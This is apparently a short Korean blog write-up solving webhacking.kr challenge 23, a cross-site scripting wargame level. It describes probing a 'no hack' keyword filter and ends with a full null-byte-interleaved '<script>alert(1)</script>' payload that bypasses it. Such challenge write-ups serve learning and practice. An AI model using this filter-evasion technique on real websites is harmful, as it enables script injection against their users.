티스토리 뷰
webhacking.kr 23번 문제 : 자바스크립트(?), 널 바이트
너의 미션은 다음 스크립트 문장을 집어 넣으세요
<script>alert(1);</script> 을 입력하면 no hack 이라고 나온다
script -> no hack
sc -> no hack
s -> 통과
그래서 결론은 한 문자씩 전달해야 하는 것이 포인트!
%0a , %0d , %20 을 연결해서 전달해 봤으나 다 실패
URL 에다가 널 바이트를 이용하면 %00 하면 된다!
<%00s%00c%00r%00i%00p%00t%00>%00a%00l%00e%00r%00t%00(%001%00)%00;%00<%00/%00s%00c%00r%00i%00p%00t%00>%00